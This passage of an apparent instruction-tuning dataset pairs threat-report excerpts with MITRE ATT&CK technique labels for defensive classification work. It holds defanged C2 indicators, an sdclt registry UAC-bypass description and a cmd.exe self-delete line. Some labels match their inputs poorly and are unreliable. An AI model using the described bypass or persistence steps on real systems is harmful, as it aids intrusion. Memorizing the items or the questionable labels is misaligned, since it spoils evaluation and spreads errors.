techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Config.json\"\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. This configuration file contains the same actor pool and wallet information as the first. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"\"XbashY\"\" from 3g2upl4pq6kufc4m[.]tk. TermsHost.exe\"\" is a PE32 Monero miner. Based on the config file it uses, it appears to be the Monero Silent Miner. This miner can be purchased online for $14 and targets malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \"\"Windows processes to bypass firewalls. The sample grabs the config file \"\"xmr.txt,\"\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. The sample also creates the UPX-packed file \"\"dDNLQrsBUE.url\"\" in the Windows Start Menu Folder\"", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Config.json\"\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"\"XbashY\"\" from 3g2upl4pq6kufc4m[.]tk. TermsHost.exe\"\" is a PE32 Monero miner. Based on the config file it uses, it appears to be the Monero Silent Miner. This miner can be purchased online for $14 and targets malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \"\"Windows processes to bypass firewalls. The sample grabs the config file \"\"xmr.txt,\"\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. The sample also creates the UPX-packed file \"\"dDNLQrsBUE.url\"\" in the Windows Start Menu Folder. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system\"", + "output": "- T1027.002: Obfuscated Files or Information - Software Packing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In this version, a shortcut is created in order to launch winnit.exe in the following path %USERPROFILE%\\Start Menu\\Programs\\Startup\\Anti virus service.lnk. As in the previous version, the ID of the infected system is generated with exactly the same method. The C2 is different and the analysed version this time only contains a single domain", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Hardcore Nationalist group SideWinder is a threat group active since 2012 according to Kaspersky. This group mainly targets Pakistanis and Chinese military & government entities\u2019 windows machines. They also target mobile phone devices. This is the second time this group is using COVID-19 theme to lure victims, thereby capitalizing on the fear of global pandemic. Sidewinder aka HN2 is believed to be an Indian state sponsored group. A detailed analysis of SideWinder attacks on Pakistani military officials was also published in April", + "output": "- T1204.002: User Execution - Malicious File\n- T1204.001: User Execution - Malicious Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "WastedLocker will attempt to encrypt files on local as well as remote (network adjacent and accessible) and removable drives", + "output": "- T1135: Network Share Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The infection chain starts with an email in which the victim receives a download link that fetches the first-stage downloader. As we found in our analysis, this first-stage downloader is responsible for fetching a malicious MSI file hosted on an\u00a0attacker-controlled GitHub page. This MSI file is downloaded and executed on the endpoint. As a result, a malicious Python-compiled binary is dropped on the file system, which uses the Dropbox API for command-and-control (C&C) communication", + "output": "- T1102.002: Web Service - Bidirectional Communication\n- T1204.001: User Execution - Malicious Link\n- T1566.002: Phishing - Spearphishing Link\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "At the second stage, the attackers remotely connected to the device and scanned the local network seeking to gain access to public shared folders, web servers, and any other open resources. The aim was to harvest information about the network, above all, servers and workstations used for making payments. At the same time, the attackers tried to brute-force or sniff login data for such machines. If the firewall blocked access from one segment of the network to another, but allowed a reverse connection, the attackers used a different payload to build tunnels", + "output": "- T1040: Network Sniffing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As a result of all of the above actions, when attempting to surf the web, the user\u2019s web browser will first ask the attacker web page on TOR for proxy settings. The user traffic is then redirected through a proxy controlled by the attacker, who carries out a Man-In-the-Middle attack and impersonates the various sites the user attempts to surf. The attacker is free to read the victim\u2019s traffic and tamper with it in any way they please", + "output": "- T1557: Adversary-in-the-Middle" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Controlled by Micropsia operators, the malware is able to register to an event of USB volume insertion to detect new connected USB flash drives. Once an event is triggered, Micropsia executes an RAR tool to recursively archive files based on a predefined list of file extensions (*.xls, *.xlsx, *.csv, *.odt, *.doc, *.docx, *.ppt, *.pptx, *.pdf, *.mdb, *.accdb, *.accde, *.txt", + "output": "- T1119: Automated Collection\n- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Creates a new registry key HKCU\\Software\\Classes\\Folder\\shell\\open\\command - Sets the \u201cDefault\u201d value to \u201cpath of the malware\u201d - Creates a value \u201cDelegateExecute\u201d and sets the value to \u201c0\u201d - Executes %systemDirectory%sdclt.exe to bypass the UAC as shown below (figure 7", + "output": "- T1112: Modify Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "These two files, keyword_parm.txt and parm.txt contain instructions for MESSAGETAP to target and save contents of SMS messages", + "output": "- T1560.003: Archive Collected Data - Archive via Custom Method" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) Send initial proxy module request. The initial request contains the bot ID, external IP address of the infected machine, reverse DNS lookup of the external IP address, internet speed (measured earlier) and seconds since the proxy module started. 2) Establish a connection (proxy commands sequence 1->10->11) with the PROXY-C2. 3) Initialize sessions, perform socks5 authorization with login/password (received from PROXY-C2 with command 10). 4) Begin SOCKS5-like communication wrapped into the QakBot proxy module protocol", + "output": "- T1090.002: Proxy - External Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A technical relevant fact about this campaign is the use of Python embedded into Windows executables of the malware. There is no multi-platform support as the code is heavily Windows-oriented (use of libraries). However, we discovered several clues that the attackers prepared the infrastructure for Mac OS X and Unix victims as well. In addition to Windows components, we also found a mobile (Android) component", + "output": "- T1059.006: Command and Scripting Interpreter - Python\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Guloader is a downloader that has been active since 2019. It is known to deliver various malware, more notably: Agent-Tesla, Netwire, FormBook, Nanocore, and Parallax RAT", + "output": "- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "All of the backdoors identified \u2013 excluding RoyalDNS \u2013 required APT15 to create batch scripts in order to install its persistence mechanism. This was achieved through the use of a simple Windows run key", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once communication with the C2 server has been established, QakBot is known to download and use additional modules in order to perform its malicious operations", + "output": "- T1095: Non-Application Layer Protocol\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When generating the URLs within the HTTP POST and GET requests, XAgent sets one HTTP parameter using a specific data structure that contains this agent_id value. This parameter transmits the agent_id to the C2 server to obtain commands the actor wishes to execute on the compromised system. The data structure used to transmit the agent_id to the C2 is as follows", + "output": "- T1106: Native API" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Inception\u2019s malware is modular and the attackers will load plugins based on requirements for each attack. The group has used a range of plugins in recent attacks, some of which are improved versions of plugins used in 2014, while others were previously unseen", + "output": "- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Following the initial compromise, in many instances the BackdoorDiplomacy group employed open-source reconnaissance and red-team tools to evaluate the environment for additional targets of opportunity and lateral movement. Among the tools documented are", + "output": "- T1588.002: Obtain Capabilities - Tool\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once the library is called by one of the triggering events implemented in its code, it reads a configuration file from a shared Google Document. If it is not able to connect to the address, it uses a hardcoded one", + "output": "- T1565.002: Data Manipulation - Transmitted Data Manipulation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The threat actor connected via Remote Desktop from a Domain Controller to a vCenter server and opened a PowerShell console, then used the PowerShell command -ep bypass to circumvent the execution policy. Using the Windows Azure Active Directory PowerShell Module, the threat actor connected to the victim\u2019s O365 tenant and began performing enumeration queries", + "output": "- T1087.002: Account Discovery - Domain Account\n- T1482: Domain Trust Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After the payload execution it reaches out to the C2 via POST request as shown below", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "All RDAT samples have malicious verdicts in WildFire and have protections in place through Cortex XDR. DNS tunneling protocols used for C2 communications are blocked via DNS Security. All C2 domains are classified as Command-and-Control for URL Filtering. AutoFocus customers can monitor activity via the rdat_backdoor tag", + "output": "- T1132.001: Data Encoding - Standard Encoding\n- T1132.002: Data Encoding - Non-Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Endpoint Protection . The Trojan.Hydraq Incident . It has been about a week since news of the mysterious Hydraq Trojan (also known as Aurora) attack broke with the unveiling of a threat by Google to pull its operations out of China. In addition the blog also mentioned that a host of other large corporations were also targets of this same attack. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. Considering the efforts that the attackers put into staging the attack as a whole, the end malware is not so sophisticated. Download a remote file, save it as %Temp%\\mdm.exe, and then execute it. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim\u2019s machine by taking advantage of the vulnerability. Prevention & Mitigation Trojan.Hydraq has been known to be spread through specially crafted PDF files and also through malicious Web sites. The attacker can exploit this issue by supplying a malicious Flash ('.swf') file or by embedding a malicious Flash application in a PDF file", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"FireEye has dubbed the cybercrime gang FIN5. One of the most unique things about FIN5 is that in every intrusion we responded to where FIN5 has been active, legitimate access was identified. They had valid user credentials to remotely log into the network,\"\" said Barry Vengerik, principal threat analyst at FireEye. No sexy zero-days, no remote exploits -- not even spearphishing\"", + "output": "- T1110: Brute Force" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It looks like GrowlHelper creates an executable named Software Update Check when it thinks it\u2019s online. I was pretty excited when I first found this, but quickly realized it just drops a copy of itself with a different name", + "output": "- T1036.004: Masquerading - Masquerade Task or Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. FireEye's Managed Defense has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection", + "output": "- T1552.006: Unsecured Credentials - Group Policy Preferences\n- T1003.001: OS Credential Dumping - LSASS Memory\n- T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- T1003.004: OS Credential Dumping - LSA Secrets\n- T1588.002: Obtain Capabilities - Tool\n- T1555: Credentials from Password Stores\n- T1552.001: Unsecured Credentials - Credentials In Files\n- T1003.005: OS Credential Dumping - Cached Domain Credentials" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PowerPunch also provides an excellent example of this. The key is applied to an executable payload downloaded directly from adversary infrastructure, allowing for an encryption key unique to the target host (highlighted variables names were changed for clarity", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attackers manually send a command to the JS or C# component to drop and execute a batch file from one of their servers. That batch file writes a malicious INF file and supplies it as a parameter to the Microsoft utility cmstp.exe, which executes a remote scriptlet specified in the INF file. This technique has been documented in the MITRE ATT&CK knowledge base as CMSTP; an example of how this technique is used may be found here. This technique has been used in the past by Cobalt, another financially motivated group. The remote scriptlet contains obfuscated JS code that drops an OCX file and executes it via regsvr32.exe", + "output": "- T1059.007: Command and Scripting Interpreter - JavaScript" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "cmd.exe /C choice /C Y /N /D Y /T 2 & Del After sleeping, the Trojan will create a GUID and write it to %APPDATA%\\Windows\\GDI.bin. It then moves itself to %APPDATA%\\Windows\\WindowsImplantment.exe and sets both of these files to have the hidden and system flags to hide them from the user. With the Trojan moved its final location, it will then create a scheduled task to run a VBScript to make sure it runs persistently. This differs from the previous OopsIE variant that used a hardcoded task name for the scheduled task. This process ultimately attempts to run the Trojan every three minutes, which is important as OopsIE relies on this scheduled task as it does not include a main loop to continue its execution. After creating this scheduled task for persistence, the Trojan will begin communicating with its C2 server. The process in which the Trojan communicates with its C2 server is very similar to the previous OopsIE Trojan that we discussed in our previous blog. Also, the oops string used to signify and erroneous transmission from the C2, which gave OopsIE its name is reversed to spoo. hex(STDOUT of whoami command)> If the C2 server wishes to send a command, it will respond to the beacon above by echoing the whoami command results sent by the Trojan to the C2 in the URL. The command handler in this OopsIE variant is very similar to the previous version, as it contains the same three (1, 2 and 3) commands seen in Table 2", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In october 2016 Group-IB published the report about the Cobalt group. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. However, when there is use of a security policy that prohibits the transfer of encrypted archives, such an email message may be blocked, so the attackers would send .doc files that contain exploits for Microsoft Office (fig. For organizations that perform timely updates of their systems and adhere to strict security policies, the Cobalt group employs another method to deliver malicious code through emails with Word documents containing a malicious macro. Therefore, the Cobalt group registered domains are similar to real ones (for example, diebold.pw), and configured their email server to distribute acting as these legitimate domains (fig. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. Additional means of circumventing anti-virus tools include the use of exploits to increase the level of rights and privileges, bypassing UAC, and injecting code into trusted processes. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed", + "output": "- T1068: Exploitation for Privilege Escalation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The dropped payload is a DLL file that has been packed using the UPX packer. The unpacked sample is highly obfuscated and important API calls and strings have been encrypted using a custom encryption algorithm. Whenever in the code the malware needs to use a string, it takes the encrypted string and passes it into two functions to decrypt it", + "output": "- T1027.002: Obfuscated Files or Information - Software Packing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This document likely marks the first observed use of this technique by APT28. The use of DDE with PowerShell allows an attacker to execute arbitrary code on a victim\u2019s system regardless whether macros are enabled", + "output": "- T1559.002: Inter-Process Communication - Dynamic Data Exchange" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "POWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence mechanisms, including WMI\u00a0and auto-run registry key. POWERTON typically gets deployed as a later stage backdoor and is obfuscated several layers", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A batch file that is used to run Bitsadmin and Rundll to download and execute the Egregor payload. A Zip file contains a binary file that is an RClone client, renamed svchost, and RClone config files (webdav, ftp and dropbox) used later for exfiltration", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber 